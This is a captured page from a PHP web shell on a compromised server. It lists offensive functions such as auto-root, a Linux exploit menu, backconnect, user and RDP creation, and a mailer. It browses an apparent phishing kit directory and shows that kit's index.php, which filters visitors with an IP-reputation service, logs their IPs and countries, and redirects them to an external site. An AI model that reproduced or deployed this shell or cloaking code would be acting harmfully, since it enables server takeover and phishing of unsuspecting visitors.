Linux server541.iseencloud.net 5.14.0-611.55.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue May 19 15:19:29 EDT 2026 x86_64
LiteSpeed
: 162.55.65.66 | : 216.73.216.88
Cant Read [ /etc/named.conf ]
8.1.34
ensafein
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home2 /
ensafein /
public_html /
products /
[ HOME SHELL ]
Name
Size
Permission
Action
config
[ DIR ]
drwxr-xr-x
Dila_DZ.php
1.18
KB
-rw-r--r--
antibot.php
1.98
KB
-rw-r--r--
blacklists.php
7.81
KB
-rw-r--r--
error_log
938.26
KB
-rw-r--r--
index.php
1.04
KB
-rw-r--r--
proxyblock.php
2.79
KB
-rw-r--r--
visit.txt
16.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php include'Dila_DZ.php'; if(filesize("/config/antibot.ini") == 1) require_once("antibot.php"); if($onetime == "on") require_once 'onetime.php'; if($block_vpn == "on") require_once 'proxyblock.php'; if ($anti_bot=="yes"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://api.iptrooper.net/check/$ip?full=1"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $result = curl_exec($ch); $result = json_decode($result); //define all array $asn ="$result->asn"; $bad = "$result->bad"; $code = "$result->code"; $country ="$result->country"; $ipaddress ="$result->ipaddress"; $name="$result->name"; $type="$result->type"; date_default_timezone_set('GMT'); $TIME = date("d-m-Y H:i:s"); $PP = getenv("REMOTE_ADDR"); $J7 = simplexml_load_file("http://www.geoplugin.net/xml.gp?ip=$PP"); $COUNTRY = $J7->geoplugin_countryName ; $ip = getenv("REMOTE_ADDR"); $file = fopen("visit.txt","a");fwrite($file,$ip." - ".$TIME." - " . $COUNTRY ."\n") ; ?> <?php exit(header("Location: https://ninja388.store/egocykpy/")); ?>
Close